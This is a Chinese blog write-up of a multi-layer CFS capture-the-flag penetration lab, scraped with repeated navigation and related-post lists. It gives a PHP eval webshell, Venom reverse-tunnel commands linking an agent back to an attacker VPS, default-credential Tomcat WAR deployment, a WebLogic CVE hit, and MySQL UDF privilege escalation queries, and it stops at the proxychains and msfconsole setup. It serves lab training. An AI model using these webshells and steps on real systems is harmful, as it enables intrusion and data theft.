西域大都护府第四期cfs靶场渗透记录

1.DEDECMS
2.二层探测+转发
- 2.1 tomcat
- 2.2 shiro
- 2.3 weblogic
3.第三层
- 3.1 mysql
- 3.2 Smb

官方wp： https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w

内网拓扑图

感谢西域大都护府提供这么好的cfs靶场

1.DEDECMS

首先是dedecms，会员功能被关闭了，那个前台的登陆口没法用

ps.dedecms一些漏洞

文件上传的payload：https://zhzhdoai.github.io/2019/07/28/Dedecms%E5%90%8E%E5%8F%B0getshell%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/
后台getshell：
https://zhzhdoai.github.io/2019/03/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-DedeCMS%E5%90%8E%E5%8F%B0getshell/
爆破后台目录（这个我试了木有成功）：
https://mochazz.github.io/2018/02/26/DEDECMS%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95%E6%8A%80%E5%B7%A7/

随便摸了摸还是准备先扫描网站目录
dirsearch用自己的字典扫了一下

python dirsearch.py -e php -s 1 -w worlist.dic -u http://xxx/
-s 是延迟访问

访问robots.txt

User-agent: *
Disallow: /ffffffffllllllllllaaaaaaaagggggg22222222222.txt
Disallow: /plus/ad_js.php
Disallow: /plus/advancedsearch.php
Disallow: /plus/car.php
Disallow: /plus/carbuyaction.php
Disallow: /plus/shops_buyaction.php
Disallow: /plus/erraddsave.php
Disallow: /plus/posttocar.php
Disallow: /plus/disdls.php
Disallow: /plus/feedback_js.php
Disallow: /plus/mytag_js.php
Disallow: /plus/rss.php
Disallow: /plus/search.php
Disallow: /plus/recommend.php
Disallow: /plus/stow.php
Disallow: /plus/count.php
Disallow: /include
Disallow: /templets

访问 /ffffffffllllllllllaaaaaaaagggggg22222222222.txt，得到flag2

flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7}

也用御剑扫一下，发现dede，就是后台

弱密码admin/admin登陆，然后后台文件上传
本地构造1.jpg.php（内容为<?php if(md5($_POST["pass"])=="密码的md5"){@eval($_POST[a]);} ?>）－>压缩为1.jpg.zip
在后台的文件式管理器，将压缩文件1.jpg.zip上传到soft目录下

访问dede/album_add.php
选中从zip压缩包中解压图片，浏览1.jpg.zip

标题栏目什么的都要填上（我还自己建了一个）

但是图集老是传不上去，一发布就没了，笑死，后来发现文件式管理器直接传shell就行了，我傻不拉几的

连接根目录拿到flag1 flag{f784234649d7ef161229349d1d76ba8d}

2.二层探测+转发

ifconfig可以发现有两张网卡，尝试Venom内网上线

https://blog.csdn.net/u011215939/article/details/103403545
https://xz.aliyun.com/t/4058

VPS :  ./admin_linux_x64 -lport 1233
受控端： ./agent_linux_x86 -rhost [VPS IP] -rport 1233

根据内网拓扑图，172.16.20.x 段有三台机子，fscan扫内网

./f -h 172.16.20.1/24

tomcat ： WebTitle:http://172.16.20.38:8080  code:200 len:20     title:Apache Tomcat/8.0.43
shiro ： WebTitle:http://172.16.20.76:8080/login;jsessionid=F3762797C5577813BA84F48ADAC8D740 code:200 len:10     title:Login Page
weblogic ：http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750

做流量转发，建立到node1的socks5代理

设置socks5代理，proxifier在本地开一个全局代理，成功访问二层网站

2.1 tomcat

http://172.16.20.38:8080/的tomcat管理界面是默认密码tomcat/tomcat
参考这篇文章（https://blog.csdn.net/zminr411421_/article/details/52115783）在manager里面getshell
将shell.jsp压缩成zip文件shell.zip，改后缀为war shell.war

找到自己上传压缩包的名字，点进去

冰蝎连接，得到根目录下flag3 flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

这台tomcat等一下要做第三层代理

2.2 shiro

标准shiro界面啊

没连上内存马，不知道为啥，flag4找到了flag{22fceae28669c34d139f7ff6db690acb}

2.3 weblogic

fscan扫出来7001端口有漏洞了

[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750

用Java反序列化漏洞利用工具，得到flag5 flag{b717ca3e4543f05e6970ede833d68ba4}

3.第三层

装了tomcat的主机还有一个内网IP：10.2.5.20

vemon节点上线
listen 1346

./1 -rhost 172.16.20.66 -rport 1346

开个socks通道

配置代理

上传fscan扫描内网
Chmod 777 fscan_amd64
./fscan_amd64 -h 10.2.5.1/24

10.2.5.33:3306 open
10.2.5.51:445 open
10.2.5.51:139 open
10.2.5.134:80 open
10.2.5.44:8080 open
10.2.5.20:8080 open
10.2.5.20:8009 open
[+] mysql:10.2.5.33:3306:root 123456
[*] WebTitle:http://10.2.5.20:8080     code:200 len:20     title:Apache Tomcat/8.0.43
[*] 10.2.5.51  (Windows 6.1)
[*] WebTitle:http://10.2.5.134         code:200 len:43     title:影视大全 - 最新电视剧,最新电影
[*] WebTitle:http://10.2.5.44:8080     code:404 len:0      title:None
[+] InfoScan:http://10.2.5.44:8080     [SprintBoot]
[+] http://10.2.5.20:8080/manager/html tomcat tomcat
[+] http://10.2.5.20:8080 poc-yaml-tomcat-manager-week

Log4j2：http://10.2.5.44:8080？
Mysql：10.2.5.33:3306
Smb ：10.2.5.51 (Windows 6.1) 开放445和139
Jboss ：没扫到啊，但是第二层有jboss，是不是指那个

3.1 mysql

Mysql有弱密码

[+] mysql:10.2.5.33:3306:root 123456

Navicat连接，flag不在数据库中，应该是放在服务器里，需要依托mysql执行Linux命令读文件

当 mysql secure_file_priv配置项为空（空是""而不是NULL，NULL代表不可读取），或者指定的一个目录时，即可读取文件。

mysql命令行查看 secure_file_priv 配置

show variables like "%secure_file_priv%";

可以读文件，但是不知道flag在哪里

可以用udf提权执行命令

show variables like '%compile%';             #查看主机版本及架构
show variables like 'plugin%';               #查看 plugin 目录

/usr/local/mysql/lib/plugin/

MDUT udf提权
可以参考：https://m.xp.cn/b.php/58475.html
https://xz.aliyun.com/t/7392#toc-12

得到flag7 flag{4e137c4035538ba1f76ce4d661c3006f

3.2 Smb

Smb ：10.2.5.51 (Windows 6.1) 开放445和139

配置kali里面的代理ProxyChains
https://www.cnblogs.com/student-programmer/p/6727346.html

vim /etc/proxychains4.conf

使用代理打开msf：

proxychains msfconsole

西域大都护府第四期cfs靶场渗透记录相关推荐

【评论，赢萌宠护眼小台灯】HMS Core Insights第四期，我们来聊聊：机器学习，推开AI应用的门
当机器学习遇上应用开发,会有什么样的"火花"?阅读外文时贴心的文本翻译,视频直播时"随心所欲"切换背景,这些运用到HMS Core 机器学习服务的哪些能力呢?其 ...
诗词在线网络月刊2009年第四期
http://www.chinapoesy.com/yuekan2009041.html 诗词在线网络月刊2009年第四期卷首语诗词在线网络月刊2009年第四期终于要与大家见面了由于最近很忙, ...
MS08067红队攻防第四期开班啦~
文章来源|MS08067 红队攻防培训班 6.25号我们开启了"红队攻防培训班"第一期,8.13号开启了第二期,9.5号开启了第三期班,感谢广大学员的支持,第四期又如约而至了~~ ...
智能化软件开发微访谈·第二十四期大模型时代的智能化软件生态（讨论汇编）...
CodeWisdom "智能化软件开发沙龙是由CodeWisdom团队组织的围绕智能化软件开发.数据驱动的软件开发质量与效能分析.云原生与智能化运维等相关话题开展的线上沙龙,通过微信群访谈交 ...
Datawhale团队第四期录取名单！
Datawhale团队公示:Datawhale 组织成员 Datawhale已经成立一年半了,从一开始的12个人,学习互助,到提议建立开源组织,做更多开源的事情,帮助更多学习者,也促进我们更好地成长 ...
百度黄埔学院计划第四期来了！
↑↑↑关注后"星标"Datawhale 每日干货 & 每月组队学习,不错过 Datawhale发布组织方:百度黄埔学院如今,越来越多的企业踏上新基建的浪潮,开始接触人工 ...
Datawhale第四期组队学习团队成员
第四期组队学习团队成员集训负责人评优助教基础算法梳理 Sm1les 钱令武高级算法梳理于鸿飞小雪 ML项目实践杨冰楠孙涛编程孙超小熊统计学李奇锋蓝昔 Leetcode 老 ...
2019微生物组—宏基因组分析技术专题研讨会第四期
文章目录课程简介课程大纲一.分析平台搭建二.生信基础三.图表解读和绘制专题四.宏基因组学概述五.宏基因组学有参分析流程六.宏基因组无参分析流程七.高级分析与可视化实战学习完本课程, ...
【阿里云总监课第四期】时髦的云原生应用怎么写？
为什么80%的码农都做不了架构师?>>> 概述应用已经跨入了云原生的时代.要写一个时髦的云原生应用,首先当然要了解什么是云原生.CNCF,也就是云原生计算基金会,作为目前人气 ...

西域大都护府第四期cfs靶场渗透记录

西域大都护府第四期cfs靶场渗透记录

1.DEDECMS

2.二层探测+转发

2.1 tomcat

2.2 shiro

2.3 weblogic

3.第三层

3.1 mysql

3.2 Smb

西域大都护府第四期cfs靶场渗透记录相关推荐

最新文章

热门文章

西域大都护府 第四期cfs靶场 渗透记录

西域大都护府 第四期cfs靶场 渗透记录

1.DEDECMS

2.二层探测+转发

2.1 tomcat

2.2 shiro

2.3 weblogic

3.第三层

3.1 mysql

3.2 Smb

西域大都护府 第四期cfs靶场 渗透记录相关推荐

最新文章

热门文章

西域大都护府第四期cfs靶场渗透记录

西域大都护府第四期cfs靶场渗透记录

西域大都护府第四期cfs靶场渗透记录相关推荐